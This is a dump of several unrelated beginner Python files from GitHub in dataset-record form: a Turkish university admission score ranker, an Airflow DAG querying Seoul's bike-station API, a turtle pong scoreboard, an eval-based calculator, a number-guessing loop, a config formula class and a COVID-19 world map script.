program_str.find(PROGRAM_LANG_GERMAN_STRING) ):\n return (Language.GERMAN)\n else:\n return (Language.TURKISH)\n\n def __get_program_is_evening_edu_state_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_EVENING_EDU_STRING) ):\n return (True)\n return (False)\n\n def __get_program_is_tech_high_school_priv_state_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_TECH_HIGH_SCHOOL_PRIV) ):\n return (True)\n return (False)\n\n def __get_program_scholarship_status_from_string(self, program_str):\n if ( -1 != program_str.find(PROGRAM_NO_SCHOLARSHIP_STRING) ):\n return (0)\n elif ( -1 != program_str.find(PROGRAM_SCHOLARSHIP_MARKER_STRING) ):\n if ( -1 != program_str.find(PROGRAM_FULL_SCHOLARSHIP_STRING) ):\n return (100)\n elif ( -1 != program_str.find(PROGRAM_25_PER_SCHOLARSHIP_STRING) ):\n return (25)\n elif ( -1 != program_str.find(PROGRAM_50_PER_SCHOLARSHIP_STRING) ):\n return (50)\n elif ( -1 != program_str.find(PROGRAM_75_PER_SCHOLARSHIP_STRING) ):\n return (75)\n else:\n return (-2) # indicates error\n else:\n return (-1) # indicates state university\n\n def __get_program_student_and_score_attributes(self, program_str):\n field_marker_idx = program_str.find(PROGRAM_FIELD_MARKER_STRING)\n if ( -1 == field_marker_idx ):\n raise MalformedProgramStateStringException(program_str)\n stats = (program_str[field_marker_idx + len(PROGRAM_FIELD_MARKER_STRING):]).split(\" \")\n while '' in stats:\n stats.remove('')\n for i in range(len(stats)):\n stats[i] = stats[i].strip(\"\\n\")\n if ( len(stats) != 4 ):\n raise MalformedProgramStateStringException(program_str)\n for i in range(len(stats)):\n stats[i] = stats[i].replace(\",\", \".\")\n if ( (stats[2] == PROGRAM_SCORE_NONE_STRING) and (stats[3] == PROGRAM_SCORE_NONE_STRING) ):\n return [int(stats[0]), int(stats[1]), float(0), float(0)]\n return [int(stats[0]), int(stats[1]), float(stats[2]), float(stats[3])]\n\n def __init__(self, program_str):\n self.__name = PROGRAM_NAME_STRING\n self.__scholarship = -1\n self.__is_evening_edu = False\n self.__language = Language.TURKISH\n self.__is_tech_high_school_priv = False\n self.__student_quota = 0\n self.__num_of_student_got_in = 0\n self.__score_lower_bound = 0\n self.__score_upper_bound = 0\n\n self.__language = self.__get_program_lang_from_string(program_str)\n self.__is_evening_edu = self.__get_program_is_evening_edu_state_from_string(program_str)\n self.__is_tech_high_school_priv = self.__get_program_is_tech_high_school_priv_state_from_string(program_str)\n self.__scholarship = self.__get_program_scholarship_status_from_string(program_str)\n student_and_score_attr = self.__get_program_student_and_score_attributes(program_str)\n self.__student_quota = student_and_score_attr[0]\n self.__num_of_student_got_in = student_and_score_attr[1]\n self.__score_lower_bound = student_and_score_attr[2]\n self.__score_upper_bound = student_and_score_attr[3]\n\n def get_program_lower_bound_score(self):\n return (self.__score_lower_bound)\n\n def get_program_upper_bound_score(self):\n return (self.__score_upper_bound)\n\n def get_program_name(self):\n return (self.__name)\n\n def get_program_scholarship(self):\n return (self.__scholarship)\n\n def get_program_is_private(self):\n if ( -1 == self.__scholarship ):\n return (False)\n return (True)\n\n def get_program_is_evening_edu(self):\n return (self.__is_evening_edu)\n\n def get_program_language(self):\n return (self.__language)\n\n def get_program_is_tech_high_school_priv(self):\n return (self.__is_tech_high_school_priv)\n\n def get_program_student_quota(self):\n return (self.__student_quota)\n\n def get_program_num_of_student_got_in(self):\n return (self.__num_of_student_got_in)\n\nclass Faculty:\n __name = None\n __programs = None\n\n def __init__(self, faculty_str):\n self.check_faculty_str_fmr(faculty_str)\n\n self.__name = \"\"\n self.__programs = []\n\n splitted_faculty_str = faculty_str.split('/', 1)\n self.__name = splitted_faculty_str[0]\n self.add_program(faculty_str)\n\n def check_name(self, faculty_str):\n self.check_faculty_str_fmr(faculty_str)\n splitted_faculty_str = faculty_str.split('/', 1)\n if ( splitted_faculty_str[0] == self.__name ):\n return (True)\n return (False)\n\n def add_program(self, faculty_str):\n self.check_faculty_str_fmr(faculty_str)\n splitted_faculty_str = faculty_str.split('/', 1)\n self.__programs.append(Program(splitted_faculty_str[1]))\n\n def get_faculty_name(self):\n return (self.__name)\n\n def get_num_of_programs(self):\n return (len(self.__programs))\n\n def get_program_by_index(self, index):\n return (self.__programs[index])\n\n def get_program_names_in_faculty(self):\n prog_names = []\n for p in self.__programs:\n prog_names.append(self.__name + \" - \" + p.get_program_name())\n return (prog_names)\n\n def get_program_name_and_lb_score_in_faculty(self):\n prog_name_and_scores = []\n for p in self.__programs:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + p.get_program_name(),\n 'lb_score' : p.get_program_lower_bound_score()})\n return (prog_name_and_scores)\n\n def get_program_name_and_ub_score_in_faculty(self):\n prog_name_and_scores = []\n for p in self.__programs:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + p.get_program_name(),\n 'ub_score' : p.get_program_upper_bound_score()})\n return (prog_name_and_scores)\n\n def check_if_programs_have_scholarship(self):\n for i in range(len(self.__programs)):\n if ( -1 != self.__programs[i].get_program_scholarship() ):\n return (True)\n return (False)\n\n @staticmethod\n def check_faculty_str_fmr(faculty_str):\n faculty_str_split = faculty_str.split('/')\n if ( len(faculty_str_split) != 2 ):\n raise MalformedFacultyStringException(faculty_str)\n\nclass Univesity:\n __name = None\n __faculties = None\n\n def __get_faculty_idx_with_name(self, facutly_str):\n for i in range(len(self.__faculties)):\n if ( True == self.__faculties[i].check_name(facutly_str) ):\n return (i)\n return (-1)\n\n def __check_if_faculties_have_program_with_scholarship(self):\n for i in range(len(self.__faculties)):\n if ( True == self.__faculties[i].check_if_programs_have_scholarship() ):\n return (True)\n return (False)\n\n def __init__(self, uni_str):\n self.check_uni_str_fmt(uni_str)\n\n self.__name = \"\"\n self.__faculties = []\n\n splitted_uni_str = uni_str.split('/', 1)\n self.__name = splitted_uni_str[0]\n self.add_program(uni_str)\n\n def add_program(self, uni_str):\n self.check_uni_str_fmt(uni_str)\n splitted_uni_str = uni_str.split('/', 1)\n faculty_idx = self.__get_faculty_idx_with_name(splitted_uni_str[1])\n if ( -1 == faculty_idx ):\n self.__faculties.append(Faculty(splitted_uni_str[1]))\n else:\n self.__faculties[faculty_idx].add_program(splitted_uni_str[1])\n\n def get_university_name(self):\n return (self.__name)\n\n def get_num_of_faculties(self):\n return (len(self.__faculties))\n\n def get_faculty_by_index(self, index):\n return (self.__faculties[index])\n\n def get_program_names_in_university(self):\n prog_names = []\n for f in self.__faculties:\n faculty_prog_names = f.get_program_names_in_faculty()\n for faculty_prog_name in faculty_prog_names:\n prog_names.append(self.__name + \" - \" + faculty_prog_name)\n return (prog_names)\n\n def get_program_name_and_lb_scores_in_university(self):\n prog_name_and_scores = []\n for f in self.__faculties:\n faculty_prog_name_and_scores = f.get_program_name_and_lb_score_in_faculty()\n for faculty_prog_scores in faculty_prog_name_and_scores:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + faculty_prog_scores['name'],\n 'lb_score' : faculty_prog_scores['lb_score']})\n return (prog_name_and_scores)\n\n def get_program_name_and_ub_scores_in_university(self):\n prog_name_and_scores = []\n for f in self.__faculties:\n faculty_prog_name_and_scores = f.get_program_name_and_ub_score_in_faculty()\n for faculty_prog_scores in faculty_prog_name_and_scores:\n prog_name_and_scores.append({'name' : self.__name + \" - \" + faculty_prog_scores['name'],\n 'ub_score' : faculty_prog_scores['ub_score']})\n return (prog_name_and_scores)\n\n @staticmethod\n def check_uni_str_fmt(uni_str):\n uni_str_split = uni_str.split('/')\n if ( len(uni_str_split) != 3 ):\n raise MalformedUniversityStringException(uni_str)\n\n @staticmethod\n def get_university_idx_from_uni_list(uni_list, uni_str):\n Univesity.check_uni_str_fmt(uni_str)\n splitted_uni_str = uni_str.split('/', 1)\n for i in range(len(uni_list)):\n if ( splitted_uni_str[0] == uni_list[i].get_university_name() ):\n return (i)\n return (-1)\n\nif __name__ == \"__main__\":\n university_list = []\n fd = open(\"cse_results.txt\", encoding = \"utf8\");\n while True:\n try:\n line = fd.readline()\n if ( \"\" == line ):\n break\n line.rstrip('\\n').rstrip('\\r')\n if ( \"\\n\" != line ):\n uni_idx = Univesity.get_university_idx_from_uni_list(university_list, line)\n if ( -1 == uni_idx ):\n university_list.append(Univesity(line))\n else:\n university_list[uni_idx].add_program(line)\n\n except MalformedUniversityStringException as e:\n print (e.str)\n sys.exit(1)\n except MalformedFacultyStringException as e:\n print (e.str)\n sys.exit(1)\n except MalformedProgramStateStringException as e:\n print (e.str)\n sys.exit(1)\n\n fd.close()\n\n stat_list = []\n\n for u in range(len(university_list)):\n uni = university_list[u]\n for f in range(uni.get_num_of_faculties()):\n faculty = uni.get_faculty_by_index(f)\n for p in range(faculty.get_num_of_programs()):\n prog = faculty.get_program_by_index(p)\n\n prog_full_name = (\"%-105s %-15s %-4s %-10s %-12s\" %\n ((str(uni.get_university_name()) + \" - \" + str(faculty.get_faculty_name())),\n (prog.get_program_is_private() and (\"(%\" + ((\"%3s\") % str(prog.get_program_scholarship())) + \" Burslu)\") or \"\"),\n (prog.get_program_is_evening_edu() and \"(İÖ)\" or \"\"),\n (prog.get_program_is_tech_high_school_priv() and \"(M.T.O.K.)\" or \"\"),\n ((Language.ENGLISH == prog.get_program_language()) and \"(İngilizce)\" or\n ((Language.ENGLISH == prog.get_program_language()) and \"(Almanca)\" or \"\"))))\n\n stat_list.append({'name' : prog_full_name,\n 'is_private' : prog.get_program_is_private(),\n 'lb_score' : prog.get_program_lower_bound_score(),\n 'ub_score' : prog.get_program_upper_bound_score(),\n 'scholarship' : prog.get_program_scholarship(),\n 'is_evening_edu' : prog.get_program_is_evening_edu(),\n 'language' : prog.get_program_language(),\n 'is_tech_high_school_priv': prog.get_program_is_tech_high_school_priv(),\n 'student_quota' : prog.get_program_student_quota(),\n 'num_of_student_got_in' : prog.get_program_num_of_student_got_in()})\n\n ###########################################################################\n stat_list.sort(key = lambda dict: dict['ub_score'], reverse = True)\n\n fd = open(\"Üniversitelerin Başarı Sırası (Tavan Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Üniversitelerin Başarı Sırası (Tavan Puanına Göre) :::...\\n\")\n for i in range(len(stat_list)):\n fd.write(\"%-4d - %-150s : %f\\n\" % (i + 1, stat_list[i]['name'], stat_list[i]['ub_score']))\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Devlet Üniversiteleri Başarı Sırası (Tavan Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Devlet Üniversiteleri Başarı Sırası (Tavan Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( False == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['ub_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Özel Üniversiteler Başarı Sırası (Tavan Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Özel Üniversiteler Başarı Sırası (Tavan Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( True == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['ub_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n stat_list.sort(key = lambda dict: dict['lb_score'], reverse = True)\n\n fd = open(\"Üniversitelerin Başarı Sırası (Taban Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Üniversitelerin Başarı Sırası (Taban Puanına Göre) :::...\\n\")\n for i in range(len(stat_list)):\n fd.write(\"%-4d - %-150s : %f\\n\" % (i + 1, stat_list[i]['name'], stat_list[i]['lb_score']))\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Devlet Üniversiteleri Başarı Sırası (Taban Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Devlet Üniversiteleri Başarı Sırası (Taban Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( False == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['lb_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Özel Üniversiteler Başarı Sırası (Taban Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Özel Üniversiteler Başarı Sırası (Taban Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( True == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['lb_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n\n fd = open(\"Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı.txt\", \"w\")\n fd.write(\"...::: Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı :::...\\n\")\n total_student_quota = 0\n total_num_of_student_got_in = 0\n for i in range(len(stat_list)):\n total_student_quota += stat_list[i]['student_quota']\n total_num_of_student_got_in += stat_list[i]['num_of_student_got_in']\n fd.write(\"Toplam Kontenjan : %d.\\n\" % (total_student_quota))\n fd.write(\"Toplam Yerleşen Öğrenci Sayısı : %d.\\n\" % (total_num_of_student_got_in))\n fd.write(\"Boşta Kalan Kontejan Sayısı : %d.\\n\" % (total_student_quota - total_num_of_student_got_in))\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n\n fd = open(\"Devlet Üniversiteleri Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı.txt\", \"w\")\n fd.write(\"...::: Devlet Üniversiteleri Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı :::...\\n\")\n state_uni_total_student_quota = 0\n state_uni_total_num_of_student_got_in = 0\n for i in range(len(stat_list)):\n if ( False == stat_list[i]['is_private'] ):\n state_uni_total_student_quota += stat_list[i]['student_quota']\n state_uni_total_num_of_student_got_in += stat_list[i]['num_of_student_got_in']\n fd.write(\"Toplam Kontenjan : %d.\\n\" % (state_uni_total_student_quota))\n fd.write(\"Toplam Yerleşen Öğrenci Sayısı : %d.\\n\" % (state_uni_total_num_of_student_got_in))\n fd.write(\"Boşta Kalan Kontejan Sayısı : %d.\\n\" % (state_uni_total_student_quota -\n state_uni_total_num_of_student_got_in))\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n\n fd = open(\"Özel Üniversitelerin Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı.txt\", \"w\")\n fd.write(\"...::: Özel Üniversitelerin Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı :::...\\n\")\n priv_uni_total_student_quota = 0\n priv_uni_total_num_of_student_got_in = 0\n for i in range(len(stat_list)):\n if ( True == stat_list[i]['is_private'] ):\n priv_uni_total_student_quota += stat_list[i]['student_quota']\n priv_uni_total_num_of_student_got_in += stat_list[i]['num_of_student_got_in']\n fd.write(\"Toplam Kontenjan : %d.\\n\" % (priv_uni_total_student_quota))\n fd.write(\"Toplam Yerleşen Öğrenci Sayısı : %d.\\n\" % (priv_uni_total_num_of_student_got_in))\n fd.write(\"Boşta Kalan Kontejan Sayısı : %d.\\n\" % (priv_uni_total_student_quota -\n priv_uni_total_num_of_student_got_in))\n fd.write(\"\\n\")\n fd.close()\n\n sys.exit(0)\n","repo_name":"mustafacamurlu/cse_department_stats","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"36918108427","text":"# Package Import\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.providers.http.operators.http import SimpleHttpOperator\nfrom airflow.decorators import task\nimport pendulum\n\nwith DAG(\n dag_id='dags_simple_http_operator',\n start_date=pendulum.datetime(2023, 4, 1, tz='Asia/Seoul'),\n catchup=False,\n schedule=None\n) as dag:\n\n '''서울시 공공자전거 대여소 정보'''\n tb_cycle_station_info = SimpleHttpOperator(\n task_id='tb_cycle_station_info',\n http_conn_id='openapi.seoul.go.kr',\n endpoint='{{var.value.apikey_openapi_seoul_go_kr}}/json/tbCycleStationInfo/1/10/',\n method='GET',\n headers={'Content-Type': 'application/json',\n 'charset': 'utf-8',\n 'Accept': '*/*'\n }\n )\n\n @task(task_id='python_2')\n def python_2(**kwargs):\n ti = kwargs['ti']\n rslt = ti.xcom_pull(task_ids='tb_cycle_station_info')\n import json\n from pprint import pprint\n\n pprint(json.loads(rslt))\n \n tb_cycle_station_info >> python_2()\n","repo_name":"hjkim-sun/airflow","sub_path":"dags/dags_simple_http_operator.py","file_name":"dags_simple_http_operator.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"86"} +{"seq_id":"71875396123","text":"from turtle import Turtle, Screen\r\n\r\n\r\nclass Score(Turtle):\r\n \"\"\"controlling the all the functions of score board\"\"\"\r\n def __init__(self):\r\n super().__init__()\r\n self.screen = Screen()\r\n self.screen.tracer(0)\r\n self.color(\"white\")\r\n self.penup()\r\n self.hideturtle()\r\n self.human_score = 0\r\n self.machine_score = 0\r\n self.goto(-100, 230)\r\n self.write(self.human_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.goto(100, 230)\r\n self.write(self.machine_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.screen.tracer(1)\r\n\r\n def increase_score(self, who):\r\n self.screen.tracer(0)\r\n self.clear()\r\n if who == \"left\":\r\n self.machine_score += 1\r\n elif who == \"right\":\r\n self.human_score += 1\r\n else:\r\n pass\r\n self.goto(-100, 230)\r\n self.write(self.human_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.goto(100, 230)\r\n self.write(self.machine_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.screen.tracer(1)\r\n self.screen.tracer(1)\r\n","repo_name":"BimsaraS99/PingPong-Game-For-Kids---Python-","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37318918314","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Alex Li\nage = 22\nfor i in range(10):\n #i = 0\n print('new i2',i)\n if i <3:\n guess_num = int( input(\"input your guess num:\") )\n if guess_num == age :\n print(\"Congratulations! you got it.\")\n break #不往后走了,跳出整 个loop\n elif guess_num >age:\n print(\"Think smaller!\")\n else:\n print(\"Think Big...\")\n else:\n #print(\"too many attempts...bye\")\n #break\n continue_confirm = input(\"Do you want to continue because you are stupid:\")\n if continue_confirm == 'y':\n #pass #\n i = 0\n print('new i',i)\n else:\n print(\"bye\")\n break\n","repo_name":"SesameMing/Python51CTONetwork","sub_path":"TerchaerCode/s13day1课上代码/s13day1_code/guess age 优化v3.py","file_name":"guess age 优化v3.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71947506204","text":"from typing import Callable, Mapping, Sequence, Any\nfrom randfig.transforms.config_transform import ConfigTransform\n\n\n__all__ = [\"Formula\"]\n\n\nclass Formula(ConfigTransform):\n \"\"\"\n Compute a configuration value from a ``Callable[[Mapping], Any]``.\n For example:\n\n .. exec_code::\n\n # --- hide: start ---\n from randfig import Formula\n # --- hide: stop ---\n\n init_config = {\"param_0\": 1}\n form = Formula(keys=[\"param_1\"], formula = lambda cfg: 2 * cfg[\"param_0\"])\n out = form(init_config)\n\n # --- hide: start ---\n print(f\"out: {out}\")\n # --- hide: stop ---\n \"\"\"\n\n def __init__(self, keys: Sequence[str], formula: Callable[[Mapping], Any]) -> None:\n \"\"\"\n Args:\n formula: a callable for computing ``keys``, the signature must be the\n one specified in the type hints, that is ``typing.Callable[[Mapping], Any]``.\n In order to follow that signature, ``functools.partial`` might help\n in most cases.\n \"\"\"\n super().__init__(keys)\n self.formula = formula\n\n def __call__(self, cfg: Mapping) -> Mapping:\n \"\"\"\n Compute the new keys specified by ``keys``\n following the operation defined by ``formula``.\n \"\"\"\n self._check_mapping(cfg)\n for key in self.keys:\n cfg[key] = self.formula(cfg)\n return cfg\n","repo_name":"YerePhy/randfig","sub_path":"randfig/transforms/formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"24950871337","text":"import re\r\n\r\nprint(\"Redcouz Calculator\")\r\n\r\nprevious = 0\r\nrun = True\r\n\r\ndef performMath():\r\n global run\r\n global previous\r\n equation = ''\r\n if previous == 0: #<<< Make sure thats starts at the first equation >>>\r\n \r\n equation = input('Enter Equation (Type \"Quit\" if you want to finish):')\r\n \r\n else: #<<< Sum to the previous result >>>\r\n \r\n equation = input(str(previous))\r\n \r\n if equation == \"Quit\": #<<< Ends the script >>>\r\n \r\n run = False\r\n print(\"Thanks for using may calculator, See you soon\")\r\n \r\n else: \r\n \r\n equation = re.sub('[a-zA-Z,.:()\" \"]', '', equation) #<<< Delete everything that is not a number >>>\r\n if previous == 0:\r\n \r\n previous = eval(equation)\r\n\r\n else:\r\n \r\n previous = eval(str(previous) + equation)\r\n\r\n print(\"Its equal to\", previous) #<<< Outcome >>>\r\n\r\nwhile run:\r\n performMath()\r\n\r\n\r\n","repo_name":"Redcouz/python_ex_Number1","sub_path":"ex1_calculator.py","file_name":"ex1_calculator.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"41102739560","text":"#!/usr/bin/env python\n# _*_coding:utf-8 _*_\n\"\"\"\n@Time : 21:53\n@Auther : Jarrett\n@FileName: run\n@Software: PyCharm\n\"\"\"\n\n# 各种API接口\n# https://lab.isaaclin.cn/nCoV/api/area?latest=0\n#https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_daily_reports/05-30-2020.csv\n# https://www.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40299423467b48e9ecf6\n# https://coronavirus.jhu.edu/map.html\n# https://experience.arcgis.com/experience/685d0ace521648f8a5beeeee1b9125cd\n# https://lab.isaaclin.cn/nCoV/\n# 有效https://lab.isaaclin.cn/nCoV/api/provinceName?lang=zh\n\n\nimport numpy as np\nimport pandas as pd\nimport json\nimport requests\nimport jsonpath\nfrom pyecharts.charts import Map\nfrom pyecharts import options as opts\n\ndef GetChinaData():\n \"\"\"\n 获取中国的数据\n :return:\n \"\"\"\n url = 'https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist' # 需要更换api\n response = requests.post(url).text\n resp = json.loads(response) # 使用变量resp来接收字典格式的数据\n for data in resp['data']: # 遍历提取每个国家的疫情数据\n name = data['name'] # 国家名\n confirm = data['confirm'] # 该国家疫情人数\n dead = data['dead']\n heal = data['heal']\n nowConfirm = data['nowConfirm']\n confirmCompare = data['confirmCompare']\n nowConfirmCompare = data['nowConfirmCompare']\n healCompare = data['healCompare']\n deadCompare = data['deadCompare']\n # print(name, confirm, dead,heal, nowConfirm, confirmCompare, nowConfirmCompare, healCompare, deadCompare)\n return data\n\ndef GetWorldData():\n \"\"\"\n 绘制世界地图!\n :return:\n \"\"\"\n # 1.目标网站\n url = 'https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist'\n # 2.请求资源\n resp = requests.get(url)\n # 3.提取数据\n # 类型转换 json-->dict\n data = json.loads(resp.text)\n print(data)\n name = jsonpath.jsonpath(data, \"$..name\") # 国家名\n confirm = jsonpath.jsonpath(data, \"$..confirm\") # 确诊人数\n dead = jsonpath.jsonpath(data, \"$..dead\") # 死亡人数\n nowConfirm = jsonpath.jsonpath(data, \"$..nowConfirm\") # 现存确诊人数\n confirmCompare = jsonpath.jsonpath(data, \"$..confirmCompare\") # 新增确诊\n healCompare = jsonpath.jsonpath(data, \"$..healCompare\") # 新增治愈\n deadCompare = jsonpath.jsonpath(data, \"$..deadCompare\") # 新增死亡\n\n # 以下内容参考 http://gallery.pyecharts.org/#/Map/README\n c = (\n Map()\n .add(\"确诊人数\", [list(z) for z in zip(name, confirm)], \"world\", name_map = nameMap,\n is_map_symbol_show = False)\n .add(\"死亡人数\", [list(z) for z in zip(name, dead)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"现存确诊\", [list(z) for z in zip(name, nowConfirm)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"新增确诊\", [list(z) for z in zip(name, confirmCompare)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"新增治愈\", [list(z) for z in zip(name, healCompare)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"新增死亡\", [list(z) for z in zip(name, deadCompare)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"2019-nCoV 世界地图\"),\n visualmap_opts=opts.VisualMapOpts(is_piecewise=True,\n pieces=[\n {\"min\":50000,\"label\":'>50000',\"color\":\"#893448\"},\n {\"min\":10000,\"max\":49999,\"label\":'10000-49999',\"color\":\"#ff585e\"},\n {\"min\":5000,\"max\":9999,\"label\":'5000-9999',\"color\":\"#FB8146\"},\n {\"min\":1000,\"max\":4999,\"label\":'1000-4999',\"color\":\"#ffa500\"},\n {\"min\":100,\"max\":999,\"label\":'100-999',\"color\":\"#ffb248\"},\n {\"min\":0,\"max\":99,\"label\":'0-99',\"color\":\"#fff2d1\"},\n ]),\n )\n .render(\"map_world.html\")\n )\n print('successful')\n return True\n\n# 世界各个国家的名称映射表\nnameMap = {\n 'Singapore Rep.':'新加坡',\n 'Dominican Rep.':'多米尼加',\n 'Palestine':'巴勒斯坦',\n 'Bahamas':'巴哈马',\n 'Timor-Leste':'东帝汶',\n 'Afghanistan':'阿富汗',\n 'Guinea-Bissau':'几内亚比绍',\n \"Côte d'Ivoire\":'科特迪瓦',\n 'Siachen Glacier':'锡亚琴冰川',\n \"Br. Indian Ocean Ter.\":'英属印度洋领土',\n 'Angola':'安哥拉',\n 'Albania':'阿尔巴尼亚',\n 'United Arab Emirates':'阿联酋',\n 'Argentina':'阿根廷',\n 'Armenia':'亚美尼亚',\n 'French Southern and Antarctic Lands':'法属南半球和南极领地',\n 'Australia':'澳大利亚',\n 'Austria':'奥地利',\n 'Azerbaijan':'阿塞拜疆',\n 'Burundi':'布隆迪',\n 'Belgium':'比利时',\n 'Benin':'贝宁',\n 'Burkina Faso':'布基纳法索',\n 'Bangladesh':'孟加拉国',\n 'Bulgaria':'保加利亚',\n 'The Bahamas':'巴哈马',\n 'Bosnia and Herz.':'波斯尼亚和黑塞哥维那',\n 'Belarus':'白俄罗斯',\n 'Belize':'伯利兹',\n 'Bermuda':'百慕大',\n 'Bolivia':'玻利维亚',\n 'Brazil':'巴西',\n 'Brunei':'文莱',\n 'Bhutan':'不丹',\n 'Botswana':'博茨瓦纳',\n 'Central African Rep.':'中非',\n 'Canada':'加拿大',\n 'Switzerland':'瑞士',\n 'Chile':'智利',\n 'China':'中国',\n 'Ivory Coast':'象牙海岸',\n 'Cameroon':'喀麦隆',\n 'Dem. Rep. Congo':'刚果民主共和国',\n 'Congo':'刚果',\n 'Colombia':'哥伦比亚',\n 'Costa Rica':'哥斯达黎加',\n 'Cuba':'古巴',\n 'N. Cyprus':'北塞浦路斯',\n 'Cyprus':'塞浦路斯',\n 'Czech Rep.':'捷克',\n 'Germany':'德国',\n 'Djibouti':'吉布提',\n 'Denmark':'丹麦',\n 'Algeria':'阿尔及利亚',\n 'Ecuador':'厄瓜多尔',\n 'Egypt':'埃及',\n 'Eritrea':'厄立特里亚',\n 'Spain':'西班牙',\n 'Estonia':'爱沙尼亚',\n 'Ethiopia':'埃塞俄比亚',\n 'Finland':'芬兰',\n 'Fiji':'斐',\n 'Falkland Islands':'福克兰群岛',\n 'France':'法国',\n 'Gabon':'加蓬',\n 'United Kingdom':'英国',\n 'Georgia':'格鲁吉亚',\n 'Ghana':'加纳',\n 'Guinea':'几内亚',\n 'Gambia':'冈比亚',\n 'Guinea Bissau':'几内亚比绍',\n 'Eq. Guinea':'赤道几内亚',\n 'Greece':'希腊',\n 'Greenland':'格陵兰',\n 'Guatemala':'危地马拉',\n 'French Guiana':'法属圭亚那',\n 'Guyana':'圭亚那',\n 'Honduras':'洪都拉斯',\n 'Croatia':'克罗地亚',\n 'Haiti':'海地',\n 'Hungary':'匈牙利',\n 'Indonesia':'印度尼西亚',\n 'India':'印度',\n 'Ireland':'爱尔兰',\n 'Iran':'伊朗',\n 'Iraq':'伊拉克',\n 'Iceland':'冰岛',\n 'Israel':'以色列',\n 'Italy':'意大利',\n 'Jamaica':'牙买加',\n 'Jordan':'约旦',\n 'Japan':'日本',\n 'Japan':'日本本土',\n 'Kazakhstan':'哈萨克斯坦',\n 'Kenya':'肯尼亚',\n 'Kyrgyzstan':'吉尔吉斯斯坦',\n 'Cambodia':'柬埔寨',\n 'Korea':'韩国',\n 'Kosovo':'科索沃',\n 'Kuwait':'科威特',\n 'Lao PDR':'老挝',\n 'Lebanon':'黎巴嫩',\n 'Liberia':'利比里亚',\n 'Libya':'利比亚',\n 'Sri Lanka':'斯里兰卡',\n 'Lesotho':'莱索托',\n 'Lithuania':'立陶宛',\n 'Luxembourg':'卢森堡',\n 'Latvia':'拉脱维亚',\n 'Morocco':'摩洛哥',\n 'Moldova':'摩尔多瓦',\n 'Madagascar':'马达加斯加',\n 'Mexico':'墨西哥',\n 'Macedonia':'马其顿',\n 'Mali':'马里',\n 'Myanmar':'缅甸',\n 